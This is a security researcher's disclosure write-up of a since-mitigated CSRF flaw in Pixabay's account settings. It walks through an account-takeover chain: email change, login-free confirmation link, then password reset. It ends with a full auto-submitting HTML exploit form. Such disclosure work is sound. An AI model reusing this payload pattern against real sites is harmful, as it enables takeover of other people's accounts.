How I was able to Compromise Pixabay Users Account Via CSRF

Pixabay CSRF Vulnerabilty

I want to share one of my finding on Pixabay which I have reported to them in 14th April 2013.

I have found that Pixabay following Url http://pixabay.com/en/accounts/settings was vulnerable to CSRF as the Anti-CSRF(security token) token is not getting validated on the server side. Using this CSRF vulnerability an attacker can easily change email id of any http://pixabay.com users account by changing his accounts email to his email id and after that the attacker can use the forget password option to reset the victims account password.

But there was a drawback that after changing the victims email id the victim himself have to confirm that newly added email id by logging into his account and then click on the confirmation link to confirm the addition of the newly added email id.

So now the attacker has only one option left that he again send the confirmation link(which is got into his email after the CSRF attack) to the victim while he is logged into his account, so it would be a 2 step CSRF attack but it was not easy to conduct 2 CSRF attacks one-by-one on the victims end.

So something striked that why not try to confirm that newly added email by himself. So for that the attacker created a dummy account of his own on pixabay.com and then tried to confirmed the newly added his own email id which he added into the victims pixabay account but unfortunately it didn't worked.

Again one more idea striked that why not try to confirm that newly added email by himself. So for this time the attacker opened that confirmation link without any logging or by sending it to victim. Now guess what it worked :P the newly added email id of attacker has been confirmed into the victims pixabay account and now the victim is not able to access his account nor he can reset his accounts password.

After that the attacker used the forget password option with his own email id which he has just confirmed into the victims account and received the victims user id and current password. In this way the attacker was able to compromise any pixabay users account.

Attack Scenario:

Attacker send a CSRF Payload Url http://dl-web.dropbox.com/get/Pixabay.com%20Any%20Users%20Account%20Compromise%20Via%20CSRF.html?w=AABkzWX73MbPtOpWK83pJg0in51JCirR7SfmC3v9w7eTxQ to the victims email id which contains attackers email s.test350@gmail.com.

As the victim open that Exploit Code Url while logged into his pixabay account the victim actually successfully executes the CSRF Payload on his own account and adds the attackers email id which is currently unverified and also sends an activation email on the added attackers unverified email id.

Now the attacker clicks on that activation link which was sent on his his email id and successfully activates his email id and verifies it, as the activation link can be used without login that was the major weakness in the countermeasure. After that the attacker uses the forget password option of the pixaway website with his email id s.test350@gmail.com and the attacker gets victims pixabay account password(in Plaintext) on his (attackers) email id s.test350@gmail.com and in this way the attacker successfully compromises the pixabay users account the same attack can be done on any pixabay.com users account.

CSRF Vulnerable Url:
http://pixabay.com/en/accounts/settings

CSRF Payload Hosted on Any File Upload Website:
http://dl-web.dropbox.com/get/Pixabay.com%20Any%20Users%20Account%20Compromise%20Via%20CSRF.html?w=AABkzWX73MbPtOpWK83pJg0in51JCirR7SfmC3v9w7eTxQ


CSRF Code:

<html>
<head>
</head>
<body onload=document.forms[0].submit();>
    <form action="http://pixabay.com/en/accounts/settings/" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="gender" value="m" />
      <input type="hidden" name="username" value="ajaysinghnegi" />
      <input type="hidden" name="first_name" value="ajay" />
      <input type="hidden" name="last_name" value="negi" />
      <input type="hidden" name="city" value="delhi" />
      <input type="hidden" name="country" value="india" />
      <input type="hidden" name="date_of_birth_month" value="1" />
      <input type="hidden" name="date_of_birth_day" value="1" />
      <input type="hidden" name="date_of_birth_year" value="1987" />
      <input type="hidden" name="image" value="" />
      <input type="hidden" name="about_me" value="security freak" />
      <input type="hidden" name="facebook" value="http://facebook.com/ajaysinghnegi" />
      <input type="hidden" name="twitter" value="https://twitter.com/ajaysinghnegi" />
      <input type="hidden" name="google_plus" value="https://plus.google.com/" />
      <input type="hidden" name="website" value="http://computersecuritywithethicalhacking.blogspot.in/" />
      <input type="hidden" name="options" value="MESSAGES" />
      <input type="hidden" name="options" value="NEWSLETTER" />
      <input type="hidden" name="options" value="SITE_NOTIFICATIONS" />
      <input type="hidden" name="options" value="COMMENT_NOTIFICATIONS" />
      <input type="hidden" name="options" value="FOLLOW_MAILS" />
      <input type="hidden" name="paypal" value="" />
      <input type="hidden" name="email" value="s.test350@gmail.com" />
</form>
</body>
</html>


The vulnerability has been mitigated now and the data used in the CSRF payload is all dummy data :).